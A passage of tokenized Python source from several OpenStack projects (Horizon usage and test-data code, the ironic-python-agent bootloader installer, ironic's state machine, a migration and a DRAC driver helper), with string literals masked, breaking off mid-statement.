<s> def load_test_data ( load_onto = None ) : <EOL> from openstack_dashboard . test . test_data import ceilometer_data <EOL> from openstack_dashboard . test . test_data import cinder_data <EOL> from openstack_dashboard . test . test_data import exceptions <EOL> from openstack_dashboard . test . test_data import glance_data <EOL> from openstack_dashboard . test . test_data import heat_data <EOL> from openstack_dashboard . test . test_data import keystone_data <EOL> from openstack_dashboard . test . test_data import neutron_data <EOL> from openstack_dashboard . test . test_data import nova_data <EOL> from openstack_dashboard . test . test_data import swift_data <EOL> loaders = ( <EOL> exceptions . data , <EOL> keystone_data . data , <EOL> glance_data . data , <EOL> nova_data . data , <EOL> cinder_data . data , <EOL> neutron_data . data , <EOL> swift_data . data , <EOL> heat_data . data , <EOL> ceilometer_data . data , <EOL> ) <EOL> if load_onto : <EOL> for data_func in loaders : <EOL> data_func ( load_onto ) <EOL> return load_onto <EOL> else : <EOL> return TestData ( * loaders ) <EOL> class TestData ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args ) : <EOL> for data_func in args : <EOL> data_func ( self ) <EOL> class TestDataContainer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _objects = [ ] <EOL> def add ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> for obj in args : <EOL> if obj not in self . _objects : <EOL> self . _objects . append ( obj ) <EOL> def list ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _objects <EOL> def filter ( self , filtered = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if filtered is None : <EOL> filtered = self . _objects <EOL> try : <EOL> key , value = kwargs . 
popitem ( ) <EOL> except KeyError : <EOL> return filtered <EOL> def get_match ( obj ) : <EOL> return hasattr ( obj , key ) and getattr ( obj , key ) == value <EOL> filtered = [ obj for obj in filtered if get_match ( obj ) ] <EOL> return self . filter ( filtered = filtered , ** kwargs ) <EOL> def get ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> matches = self . filter ( ** kwargs ) <EOL> if not matches : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> elif len ( matches ) > <NUM_LIT:1> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> return matches . pop ( ) <EOL> def first ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _objects [ <NUM_LIT:0> ] <EOL> def count ( self ) : <EOL> return len ( self . _objects ) </s>
<s> from __future__ import division <EOL> import datetime <EOL> from django . utils import timezone <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon import messages <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . usage import quotas <EOL> class BaseUsage ( object ) : <EOL> show_deleted = False <EOL> def __init__ ( self , request , project_id = None ) : <EOL> self . project_id = project_id or request . user . tenant_id <EOL> self . request = request <EOL> self . summary = { } <EOL> self . usage_list = [ ] <EOL> self . limits = { } <EOL> self . quotas = { } <EOL> @ property <EOL> def today ( self ) : <EOL> return timezone . now ( ) <EOL> @ staticmethod <EOL> def get_start ( year , month , day ) : <EOL> start = datetime . datetime ( year , month , day , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> return timezone . make_aware ( start , timezone . utc ) <EOL> @ staticmethod <EOL> def get_end ( year , month , day ) : <EOL> end = datetime . datetime ( year , month , day , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> return timezone . make_aware ( end , timezone . utc ) <EOL> def get_instances ( self ) : <EOL> instance_list = [ ] <EOL> [ instance_list . extend ( u . server_usages ) for u in self . usage_list ] <EOL> return instance_list <EOL> def get_date_range ( self ) : <EOL> if not hasattr ( self , "<STR_LIT:start>" ) or not hasattr ( self , "<STR_LIT:end>" ) : <EOL> args_start = ( self . today . year , self . today . month , <NUM_LIT:1> ) <EOL> args_end = ( self . today . year , self . today . month , self . today . day ) <EOL> form = self . get_form ( ) <EOL> if form . is_valid ( ) : <EOL> start = form . cleaned_data [ '<STR_LIT:start>' ] <EOL> end = form . cleaned_data [ '<STR_LIT:end>' ] <EOL> args_start = ( start . year , <EOL> start . month , <EOL> start . day ) <EOL> args_end = ( end . year , <EOL> end . month , <EOL> end . 
day ) <EOL> elif form . is_bound : <EOL> messages . error ( self . request , <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> self . start = self . get_start ( * args_start ) <EOL> self . end = self . get_end ( * args_end ) <EOL> return self . start , self . end <EOL> def init_form ( self ) : <EOL> today = datetime . date . today ( ) <EOL> self . start = datetime . date ( day = <NUM_LIT:1> , month = today . month , year = today . year ) <EOL> self . end = today <EOL> return self . start , self . end <EOL> def get_form ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> req = self . request <EOL> start = req . GET . get ( '<STR_LIT:start>' , req . session . get ( '<STR_LIT>' ) ) <EOL> end = req . GET . get ( '<STR_LIT:end>' , req . session . get ( '<STR_LIT>' ) ) <EOL> if start and end : <EOL> self . form = forms . DateForm ( { '<STR_LIT:start>' : start , '<STR_LIT:end>' : end } ) <EOL> else : <EOL> init = self . init_form ( ) <EOL> start = init [ <NUM_LIT:0> ] . isoformat ( ) <EOL> end = init [ <NUM_LIT:1> ] . isoformat ( ) <EOL> self . form = forms . DateForm ( initial = { '<STR_LIT:start>' : start , <EOL> '<STR_LIT:end>' : end } ) <EOL> req . session [ '<STR_LIT>' ] = start <EOL> req . session [ '<STR_LIT>' ] = end <EOL> return self . form <EOL> def _get_neutron_usage ( self , limits , resource_name ) : <EOL> resource_map = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : api . network . tenant_floating_ip_list , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:message>' : _ ( '<STR_LIT>' ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : api . network . security_group_list , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:message>' : _ ( '<STR_LIT>' ) <EOL> } <EOL> } <EOL> resource = resource_map [ resource_name ] <EOL> try : <EOL> method = resource [ '<STR_LIT>' ] <EOL> current_used = len ( method ( self . request ) ) <EOL> except Exception : <EOL> current_used = <NUM_LIT:0> <EOL> msg = resource [ '<STR_LIT:message>' ] <EOL> exceptions . 
handle ( self . request , msg ) <EOL> limits [ resource [ '<STR_LIT>' ] ] = current_used <EOL> def _set_neutron_limit ( self , limits , neutron_quotas , resource_name ) : <EOL> limit_name_map = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if neutron_quotas is None : <EOL> resource_max = float ( "<STR_LIT>" ) <EOL> else : <EOL> resource_max = getattr ( neutron_quotas . get ( resource_name ) , <EOL> '<STR_LIT>' , float ( "<STR_LIT>" ) ) <EOL> if resource_max == - <NUM_LIT:1> : <EOL> resource_max = float ( "<STR_LIT>" ) <EOL> limits [ limit_name_map [ resource_name ] ] = resource_max <EOL> def get_neutron_limits ( self ) : <EOL> if not api . base . is_service_enabled ( self . request , '<STR_LIT>' ) : <EOL> return <EOL> try : <EOL> neutron_quotas_supported = ( <EOL> api . neutron . is_quotas_extension_supported ( self . request ) ) <EOL> neutron_sg_used = ( <EOL> api . neutron . is_extension_supported ( self . request , <EOL> '<STR_LIT>' ) ) <EOL> if api . network . floating_ip_supported ( self . request ) : <EOL> self . _get_neutron_usage ( self . limits , '<STR_LIT>' ) <EOL> if neutron_sg_used : <EOL> self . _get_neutron_usage ( self . limits , '<STR_LIT>' ) <EOL> if neutron_quotas_supported : <EOL> neutron_quotas = api . neutron . tenant_quota_get ( self . request , <EOL> self . project_id ) <EOL> else : <EOL> neutron_quotas = None <EOL> except Exception : <EOL> neutron_sg_used = True <EOL> neutron_quotas = None <EOL> msg = _ ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , msg ) <EOL> self . _set_neutron_limit ( self . limits , neutron_quotas , '<STR_LIT>' ) <EOL> if neutron_sg_used : <EOL> self . _set_neutron_limit ( self . limits , neutron_quotas , <EOL> '<STR_LIT>' ) <EOL> def get_cinder_limits ( self ) : <EOL> """<STR_LIT>""" <EOL> if not api . cinder . is_volume_service_enabled ( self . request ) : <EOL> return <EOL> try : <EOL> self . limits . update ( api . cinder . tenant_absolute_limits ( self . 
request ) ) <EOL> except Exception : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> exceptions . handle ( self . request , msg ) <EOL> return <EOL> def get_limits ( self ) : <EOL> try : <EOL> self . limits = api . nova . tenant_absolute_limits ( self . request ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> self . get_neutron_limits ( ) <EOL> self . get_cinder_limits ( ) <EOL> def get_usage_list ( self , start , end ) : <EOL> return [ ] <EOL> def summarize ( self , start , end ) : <EOL> if not api . nova . extension_supported ( '<STR_LIT>' , self . request ) : <EOL> return <EOL> if start <= end and start <= self . today : <EOL> start = timezone . make_naive ( start , timezone . utc ) <EOL> end = timezone . make_naive ( end , timezone . utc ) <EOL> try : <EOL> self . usage_list = self . get_usage_list ( start , end ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> elif end < start : <EOL> messages . error ( self . request , <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> elif start > self . today : <EOL> messages . error ( self . request , <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> for project_usage in self . usage_list : <EOL> project_summary = project_usage . get_summary ( ) <EOL> for key , value in project_summary . items ( ) : <EOL> self . summary . setdefault ( key , <NUM_LIT:0> ) <EOL> self . summary [ key ] += value <EOL> def get_quotas ( self ) : <EOL> try : <EOL> self . quotas = quotas . tenant_quota_usages ( self . request ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> def csv_link ( self ) : <EOL> form = self . get_form ( ) <EOL> data = { } <EOL> if hasattr ( form , "<STR_LIT>" ) : <EOL> data = form . cleaned_data <EOL> if not ( '<STR_LIT:start>' in data and '<STR_LIT:end>' in data ) : <EOL> data = { "<STR_LIT:start>" : self . today . date ( ) , "<STR_LIT:end>" : self . today . 
date ( ) } <EOL> return "<STR_LIT>" % ( data [ '<STR_LIT:start>' ] , <EOL> data [ '<STR_LIT:end>' ] ) <EOL> class GlobalUsage ( BaseUsage ) : <EOL> show_deleted = True <EOL> def get_usage_list ( self , start , end ) : <EOL> return api . nova . usage_list ( self . request , start , end ) <EOL> class ProjectUsage ( BaseUsage ) : <EOL> attrs = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> def get_usage_list ( self , start , end ) : <EOL> show_deleted = self . request . GET . get ( '<STR_LIT>' , <EOL> self . show_deleted ) <EOL> instances = [ ] <EOL> deleted_instances = [ ] <EOL> usage = api . nova . usage_get ( self . request , self . project_id , start , end ) <EOL> if hasattr ( usage , '<STR_LIT>' ) : <EOL> now = self . today <EOL> for server_usage in usage . server_usages : <EOL> server_uptime = server_usage [ '<STR_LIT>' ] <EOL> total_uptime = now - datetime . timedelta ( seconds = server_uptime ) <EOL> server_usage [ '<STR_LIT>' ] = total_uptime <EOL> if server_usage [ '<STR_LIT>' ] and not show_deleted : <EOL> deleted_instances . append ( server_usage ) <EOL> else : <EOL> instances . append ( server_usage ) <EOL> usage . server_usages = instances <EOL> return ( usage , ) </s>
<s> import os <EOL> import shlex <EOL> import shutil <EOL> import tempfile <EOL> from oslo_concurrency import processutils <EOL> from oslo_log import log <EOL> from ironic_python_agent import errors <EOL> from ironic_python_agent . extensions import base <EOL> from ironic_python_agent . extensions import iscsi <EOL> from ironic_python_agent import hardware <EOL> from ironic_python_agent import utils <EOL> LOG = log . getLogger ( __name__ ) <EOL> BIND_MOUNTS = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _get_partition ( device , uuid ) : <EOL> """<STR_LIT>""" <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { '<STR_LIT>' : device , '<STR_LIT>' : uuid } ) <EOL> try : <EOL> try : <EOL> utils . execute ( '<STR_LIT>' , '<STR_LIT>' , device , attempts = <NUM_LIT:3> , <EOL> delay_on_retry = True ) <EOL> utils . execute ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> except processutils . ProcessExecutionError : <EOL> LOG . warning ( "<STR_LIT>" <EOL> "<STR_LIT>" % device ) <EOL> report = utils . execute ( '<STR_LIT>' , '<STR_LIT>' , device ) [ <NUM_LIT:0> ] <EOL> for line in report . split ( '<STR_LIT:\n>' ) : <EOL> part = { } <EOL> vals = shlex . split ( line ) <EOL> for key , val in ( v . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) for v in vals ) : <EOL> part [ key ] = val . strip ( ) <EOL> if part . get ( '<STR_LIT>' ) != '<STR_LIT>' : <EOL> continue <EOL> if part . get ( '<STR_LIT>' ) == uuid : <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , { '<STR_LIT>' : uuid , '<STR_LIT>' : device } ) <EOL> return '<STR_LIT>' + part . get ( '<STR_LIT>' ) <EOL> else : <EOL> error_msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" % { '<STR_LIT>' : uuid , '<STR_LIT>' : device } ) <EOL> LOG . error ( error_msg ) <EOL> raise errors . DeviceNotFound ( error_msg ) <EOL> except processutils . ProcessExecutionError as e : <EOL> error_msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> { '<STR_LIT>' : uuid , '<STR_LIT>' : device , '<STR_LIT>' : e } ) <EOL> LOG . error ( error_msg ) <EOL> raise errors . 
CommandExecutionError ( error_msg ) <EOL> def _install_grub2 ( device , root_uuid , efi_system_part_uuid = None ) : <EOL> """<STR_LIT>""" <EOL> LOG . debug ( "<STR_LIT>" , device ) <EOL> root_partition = _get_partition ( device , uuid = root_uuid ) <EOL> efi_partition = None <EOL> efi_partition_mount_point = None <EOL> try : <EOL> path = tempfile . mkdtemp ( ) <EOL> if efi_system_part_uuid : <EOL> efi_partition = _get_partition ( device , uuid = efi_system_part_uuid ) <EOL> efi_partition_mount_point = os . path . join ( path , "<STR_LIT>" ) <EOL> utils . execute ( '<STR_LIT>' , root_partition , path ) <EOL> for fs in BIND_MOUNTS : <EOL> utils . execute ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , fs , path + fs ) <EOL> utils . execute ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:none>' , path + '<STR_LIT>' ) <EOL> if efi_partition : <EOL> if not os . path . exists ( efi_partition_mount_point ) : <EOL> os . makedirs ( efi_partition_mount_point ) <EOL> utils . execute ( '<STR_LIT>' , efi_partition , efi_partition_mount_point ) <EOL> binary_name = "<STR_LIT>" <EOL> if os . path . exists ( os . path . join ( path , '<STR_LIT>' ) ) : <EOL> binary_name = "<STR_LIT>" <EOL> path_variable = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> path_variable = '<STR_LIT>' % path_variable <EOL> utils . execute ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> { '<STR_LIT:path>' : path , '<STR_LIT>' : binary_name , '<STR_LIT>' : device } , <EOL> shell = True , env_variables = { '<STR_LIT>' : path_variable } ) <EOL> utils . execute ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> { '<STR_LIT:path>' : path , '<STR_LIT>' : binary_name } , shell = True , <EOL> env_variables = { '<STR_LIT>' : path_variable } ) <EOL> LOG . info ( "<STR_LIT>" , device ) <EOL> except processutils . ProcessExecutionError as e : <EOL> error_msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' % { '<STR_LIT>' : device , '<STR_LIT>' : e } ) <EOL> LOG . error ( error_msg ) <EOL> raise errors . 
CommandExecutionError ( error_msg ) <EOL> finally : <EOL> umount_warn_msg = "<STR_LIT>" <EOL> umount_binds_fail = False <EOL> try : <EOL> if efi_partition : <EOL> utils . execute ( '<STR_LIT>' , efi_partition_mount_point , attempts = <NUM_LIT:3> , <EOL> delay_on_retry = True ) <EOL> except processutils . ProcessExecutionError as e : <EOL> error_msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' % e ) <EOL> LOG . error ( error_msg ) <EOL> raise errors . CommandExecutionError ( error_msg ) <EOL> for fs in BIND_MOUNTS : <EOL> try : <EOL> utils . execute ( '<STR_LIT>' , path + fs , attempts = <NUM_LIT:3> , <EOL> delay_on_retry = True ) <EOL> except processutils . ProcessExecutionError as e : <EOL> umount_binds_fail = True <EOL> LOG . warning ( umount_warn_msg , { '<STR_LIT:path>' : path + fs , '<STR_LIT:error>' : e } ) <EOL> try : <EOL> utils . execute ( '<STR_LIT>' , path + '<STR_LIT>' , attempts = <NUM_LIT:3> , <EOL> delay_on_retry = True ) <EOL> except processutils . ProcessExecutionError as e : <EOL> umount_binds_fail = True <EOL> LOG . warning ( umount_warn_msg , { '<STR_LIT:path>' : path + '<STR_LIT>' , '<STR_LIT:error>' : e } ) <EOL> if not umount_binds_fail : <EOL> try : <EOL> utils . execute ( '<STR_LIT>' , path , attempts = <NUM_LIT:3> , delay_on_retry = True ) <EOL> except processutils . ProcessExecutionError as e : <EOL> LOG . warning ( umount_warn_msg , { '<STR_LIT:path>' : path , '<STR_LIT:error>' : e } ) <EOL> else : <EOL> shutil . rmtree ( path ) <EOL> class ImageExtension ( base . BaseAgentExtension ) : <EOL> @ base . sync_command ( '<STR_LIT>' ) <EOL> def install_bootloader ( self , root_uuid , efi_system_part_uuid = None ) : <EOL> """<STR_LIT>""" <EOL> device = hardware . dispatch_to_managers ( '<STR_LIT>' ) <EOL> iscsi . clean_up ( device ) <EOL> _install_grub2 ( device , <EOL> root_uuid = root_uuid , <EOL> efi_system_part_uuid = efi_system_part_uuid ) </s>
<s> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> from ironic_python_agent . version import version_info as ipa_version <EOL> release = ipa_version . version_string_with_vcs ( ) <EOL> version = ipa_version . canonical_version_string ( ) <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from oslo_config import cfg <EOL> from oslo_log import log <EOL> from oslo_service import service <EOL> from ironic . common import service as ironic_service <EOL> CONF = cfg . CONF <EOL> def main ( ) : <EOL> ironic_service . prepare_service ( sys . argv ) <EOL> mgr = ironic_service . RPCService ( CONF . host , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> LOG = log . getLogger ( __name__ ) <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> CONF . log_opt_values ( LOG , log . DEBUG ) <EOL> launcher = service . launch ( CONF , mgr ) <EOL> launcher . wait ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( main ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from oslo_log import log as logging <EOL> from ironic . common import fsm <EOL> LOG = logging . getLogger ( __name__ ) <EOL> VERBS = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> """<STR_LIT>""" <EOL> NOSTATE = None <EOL> """<STR_LIT>""" <EOL> ENROLL = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> VERIFYING = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> MANAGEABLE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> AVAILABLE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> ACTIVE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> DEPLOYWAIT = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> DEPLOYING = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> DEPLOYFAIL = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> DEPLOYDONE = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> DELETING = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> DELETED = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> CLEANING = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> CLEANWAIT = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> CLEANFAIL = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> ERROR = '<STR_LIT:error>' <EOL> """<STR_LIT>""" <EOL> REBUILD = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> INSPECTING = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> INSPECTFAIL = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> UPDATE_ALLOWED_STATES = ( DEPLOYFAIL , INSPECTING , INSPECTFAIL , CLEANFAIL , ERROR , <EOL> VERIFYING ) <EOL> """<STR_LIT>""" <EOL> DELETE_ALLOWED_STATES = ( AVAILABLE , NOSTATE , MANAGEABLE , ENROLL ) <EOL> """<STR_LIT>""" <EOL> STABLE_STATES = ( ENROLL , MANAGEABLE , AVAILABLE , ACTIVE , ERROR ) <EOL> """<STR_LIT>""" <EOL> POWER_ON = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> POWER_OFF = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> REBOOT = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> def on_exit ( old_state , event ) : <EOL> """<STR_LIT>""" <EOL> LOG . 
debug ( "<STR_LIT>" , <EOL> old_state , event ) <EOL> def on_enter ( new_state , event ) : <EOL> """<STR_LIT>""" <EOL> LOG . debug ( "<STR_LIT>" , <EOL> new_state , event ) <EOL> watchers = { } <EOL> watchers [ '<STR_LIT>' ] = on_exit <EOL> watchers [ '<STR_LIT>' ] = on_enter <EOL> machine = fsm . FSM ( ) <EOL> for state in STABLE_STATES : <EOL> machine . add_state ( state , stable = True , ** watchers ) <EOL> machine . add_state ( VERIFYING , target = MANAGEABLE , ** watchers ) <EOL> machine . add_state ( DEPLOYING , target = ACTIVE , ** watchers ) <EOL> machine . add_state ( DEPLOYWAIT , target = ACTIVE , ** watchers ) <EOL> machine . add_state ( DEPLOYFAIL , target = ACTIVE , ** watchers ) <EOL> machine . add_state ( CLEANING , target = AVAILABLE , ** watchers ) <EOL> machine . add_state ( CLEANWAIT , target = AVAILABLE , ** watchers ) <EOL> machine . add_state ( CLEANFAIL , target = AVAILABLE , ** watchers ) <EOL> machine . add_state ( DELETING , target = AVAILABLE , ** watchers ) <EOL> machine . add_transition ( AVAILABLE , DEPLOYING , '<STR_LIT>' ) <EOL> machine . add_state ( INSPECTING , target = MANAGEABLE , ** watchers ) <EOL> machine . add_state ( INSPECTFAIL , target = MANAGEABLE , ** watchers ) <EOL> machine . add_transition ( DEPLOYING , DEPLOYFAIL , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYFAIL , DEPLOYING , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYFAIL , DEPLOYING , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYING , DEPLOYWAIT , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYWAIT , DEPLOYING , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYWAIT , DEPLOYFAIL , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYING , ACTIVE , '<STR_LIT>' ) <EOL> machine . add_transition ( ACTIVE , DEPLOYING , '<STR_LIT>' ) <EOL> machine . add_transition ( ACTIVE , DELETING , '<STR_LIT>' ) <EOL> machine . add_transition ( DEPLOYWAIT , DELETING , '<STR_LIT>' ) <EOL> machine . 
add_transition ( DEPLOYFAIL , DELETING , '<STR_LIT>' ) <EOL> machine . add_transition ( DELETING , ERROR , '<STR_LIT:error>' ) <EOL> machine . add_transition ( DELETING , CLEANING , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANING , AVAILABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANING , CLEANFAIL , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANWAIT , CLEANFAIL , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANWAIT , CLEANFAIL , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANING , CLEANWAIT , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANWAIT , CLEANING , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANFAIL , MANAGEABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( MANAGEABLE , CLEANING , '<STR_LIT>' ) <EOL> machine . add_transition ( MANAGEABLE , CLEANING , '<STR_LIT>' ) <EOL> machine . add_transition ( CLEANING , MANAGEABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( AVAILABLE , MANAGEABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( ERROR , DEPLOYING , '<STR_LIT>' ) <EOL> machine . add_transition ( ERROR , DELETING , '<STR_LIT>' ) <EOL> machine . add_transition ( MANAGEABLE , INSPECTING , '<STR_LIT>' ) <EOL> machine . add_transition ( INSPECTING , MANAGEABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( INSPECTING , INSPECTFAIL , '<STR_LIT>' ) <EOL> machine . add_transition ( INSPECTFAIL , MANAGEABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( INSPECTFAIL , INSPECTING , '<STR_LIT>' ) <EOL> machine . add_transition ( ENROLL , VERIFYING , '<STR_LIT>' ) <EOL> machine . add_transition ( VERIFYING , MANAGEABLE , '<STR_LIT>' ) <EOL> machine . add_transition ( VERIFYING , ENROLL , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> from sqlalchemy import Boolean , String <EOL> from sqlalchemy . sql import table , column , null <EOL> port = table ( '<STR_LIT>' , <EOL> column ( '<STR_LIT>' , String ( <NUM_LIT> ) ) , <EOL> column ( '<STR_LIT>' , Boolean ( ) ) ) <EOL> def upgrade ( ) : <EOL> op . execute ( <EOL> port . update ( ) . where ( <EOL> port . c . pxe_enabled == null ( ) ) . values ( <EOL> { '<STR_LIT>' : True } ) ) </s>
<s> """<STR_LIT>""" <EOL> from oslo_utils import importutils <EOL> from ironic . common import exception <EOL> from ironic . common . i18n import _ <EOL> from ironic . common import utils <EOL> drac_client = importutils . try_import ( '<STR_LIT>' ) <EOL> drac_constants = importutils . try_import ( '<STR_LIT>' ) <EOL> REQUIRED_PROPERTIES = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } <EOL> OPTIONAL_PROPERTIES = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> } <EOL> COMMON_PROPERTIES = REQUIRED_PROPERTIES . copy ( ) <EOL> COMMON_PROPERTIES . update ( OPTIONAL_PROPERTIES ) <EOL> def parse_driver_info ( node ) : <EOL> """<STR_LIT>""" <EOL> driver_info = node . driver_info <EOL> parsed_driver_info = { } <EOL> error_msgs = [ ] <EOL> for param in REQUIRED_PROPERTIES : <EOL> try : <EOL> parsed_driver_info [ param ] = str ( driver_info [ param ] ) <EOL> except KeyError : <EOL> error_msgs . append ( _ ( "<STR_LIT>" ) % param ) <EOL> except UnicodeEncodeError : <EOL> error_msgs . append ( _ ( "<STR_LIT>" ) % param ) <EOL> parsed_driver_info [ '<STR_LIT>' ] = driver_info . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> try : <EOL> parsed_driver_info [ '<STR_LIT>' ] = str ( driver_info . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> except UnicodeEncodeError : <EOL> error_msgs . append ( _ ( "<STR_LIT>" ) ) <EOL> try : <EOL> parsed_driver_info [ '<STR_LIT>' ] = str ( <EOL> driver_info . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if parsed_driver_info [ '<STR_LIT>' ] not in [ '<STR_LIT:http>' , '<STR_LIT>' ] : <EOL> error_msgs . append ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> except UnicodeEncodeError : <EOL> error_msgs . append ( _ 